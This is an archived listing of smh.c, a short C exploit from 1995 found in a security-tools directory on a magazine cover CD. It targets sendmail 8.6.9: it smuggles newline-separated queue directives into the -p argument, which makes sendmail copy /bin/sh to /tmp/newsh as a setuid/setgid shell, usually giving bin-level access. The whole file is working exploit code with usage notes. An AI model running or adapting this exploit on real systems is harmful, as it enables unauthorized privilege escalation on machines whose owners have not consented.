Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / sendmail / smh.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 2KB | 36 lines

/* smh.c - Michael R. Widner - atreus (2/27/95) * <widner@uchicago.edu> <atreus@primus.com> * a quick hack to abuse sendmail 8.6.9 or whatever else is subject to this * hole. It's really just a matter of passing newlines in arguments to * sendmail and getting the stuff into the queue files. If we run this * locally with -odq we are guaranteed that it will be queue, rather than * processed immediately. Wait for the queue to get processed automatically * or just run sendmail -q if you're impatient. * * usage: smh [ username [/path/to/sendmail]] * * It's worth noting that this is generally only good for getting bin. * sendmail still wants to process the sendmail.cf file, which contains * Ou1 and Og1 most of the time, limiting you to bin access. Is there * a way around this? * * cc -o smh smh.c should do the trick. This just creates a bin owned * mode 6777 copy of /bin/sh in /tmp called /tmp/newsh. Note that on some * systems this is pretty much worthless, but you're smart enough to know * which systems those are. Aren't you? */ #include <sys/types.h> #include <unistd.h> #include <stdlib.h> main(argc, argv) int argc; char **argv; { execlp(argv[2] ? argv[2] : "sendmail","sendmail","-odq","-p", "ascii\nCroot\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nMlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nR<\"|/bin/cp /bin/sh /tmp/newsh\">\nR<\"|/bin/chmod 6777 /tmp/newsh\">\n$rascii ", argv[1] ? argv[1] : "atreus",0); } /* www.hack.co.za [2000]*/